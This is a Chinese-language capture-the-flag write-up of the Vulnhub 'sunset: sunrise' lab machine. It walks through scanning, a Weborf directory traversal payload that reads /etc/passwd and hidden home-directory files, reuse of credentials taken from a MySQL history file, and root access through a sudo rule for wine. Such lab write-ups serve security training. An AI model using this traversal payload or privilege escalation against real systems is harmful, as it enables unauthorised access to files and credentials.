【Vulnhub】Sunset:sunrise--WriteUp

selph
selph
发布于 2020-01-16 / 782 阅读
0
0

【Vulnhub】Sunset:sunrise--WriteUp

靶机信息:

Name: sunset: sunrise
Date release: 6 Dec 2019
Difficulty: Beginner
Task:boot2root

关键知识点、工具

  • 主机发现 arp-scan
  • 端口扫描 nmap
  • Web目录爆破 dirb
  • 漏洞搜索与利用
  • wine-SUID提权

渗透过程

主机发现

root@windows7:~# arp-scan 10.2.2.0/24
Interface: eth0, type: EN10MB, MAC: 08:00:27:22:f1:08, IPv4: 10.2.2.11
Starting arp-scan 1.9.6 with 256 hosts (https://github.com/royhills/arp-scan)
10.2.2.1        52:54:00:12:35:00       QEMU
10.2.2.2        52:54:00:12:35:00       QEMU
10.2.2.3        08:00:27:51:05:1d       PCS Systemtechnik GmbH
10.2.2.12       08:00:27:52:f8:14       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.6: 256 hosts scanned in 2.026 seconds (126.36 hosts/sec). 4 responded

目标在:10.2.2.12

信息收集

root@windows7:~# nmap -A -T4 10.2.2.12 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-15 23:51 EST
Nmap scan report for 10.2.2.12
Host is up (0.0016s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:dd:45:a2:9b:e7:bf:aa:30:e3:f0:96:ac:7c:0b:7c (RSA)
|   256 b4:c2:9b:4d:6f:86:67:02:cf:f6:43:8b:e2:64:ea:04 (ECDSA)
|_  256 cb:f2:e6:cd:e3:e1:0f:bf:ce:e0:a2:3b:84:ae:97:74 (ED25519)
80/tcp   open  http       nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL, RPCCheck: 
|_    Host '10.2.2.11' is not allowed to connect to this MariaDB server
8080/tcp open  http-proxy Weborf (GNU/Linux)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-methods: 
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-server-header: Weborf (GNU/Linux)
|_http-title: Weborf
| http-webdav-scan: 
|   WebDAV type: Apache DAV
|   Server Type: Weborf (GNU/Linux)
|_  Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

MAC Address: 08:00:27:52:F8:14 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.55 ms 10.2.2.12

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.77 seconds

发现目标开启服务以及端口为:

  • ssh:22,OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
  • http:80,nginx 1.14.2
  • mysql,3306
  • http,8080,Weborf/0.12.2

访问80发现就是个nginx的初始页面,没啥东西

访问8080存在文件遍历,并且得知服务版本

漏洞利用

exploit-db搜索该服务得知:

该服务存在目录遍历漏洞,payload为

/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

查看passwd可知,该服务器存在两个用户:sunrise,weborf

访问用户目录查看:

sunrise目录是普通用户的目录,下有一个user.txt文件,内容为:

a6050aecf6303b0b824038807d823a89

可能是个密文密码,送到md5网站在线解密失败


weborf目录应该是装服务的目录,可能存在隐藏文件

目录爆破

root@windows7:~# dirb http://10.2.2.12:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

+ http://10.2.2.12:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.bashrc (CODE:200|SIZE:3526)
+ http://10.2.2.12:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history (CODE:200|SIZE:83)
+ http://10.2.2.12:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.profile (CODE:200|SIZE:807)

通过dirb默认字典进行爆破,爆破出三个隐藏文件

在mysql_history文件中得知数据库账号密码

通过ssh连接weborf用户进入服务器

SUID提权

查看内核版本,搜索exp,看能不能通过exp提权

weborf@sunrise:~$ uname -a
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux

没查到结果

查找SUID文件看看有没有错误配置提权,也没有

登录数据库看看吧,在mysql库中的user表中得知如下信息:

这个sunrise的密码看起来就是明文,拿去登录试试

登录成功!

查看一下可sudo执行的命令:

sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise: 
Matching Defaults entries for sunrise on sunrise:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunrise may run the following commands on sunrise:
    (root) /usr/bin/wine

wine命令可以以root权限运行,那该如何利用呢
这里我查了半天如何用wine进入命令行交互模式,最后发现,通过wine打开cmd就好了,
然后就是通过cmd命令查看root目录即可

成功通关

PS:其实这里除了使用cmd.exe,还可以自己上传exe来控制,但是能用自带的cmd岂不美哉


评论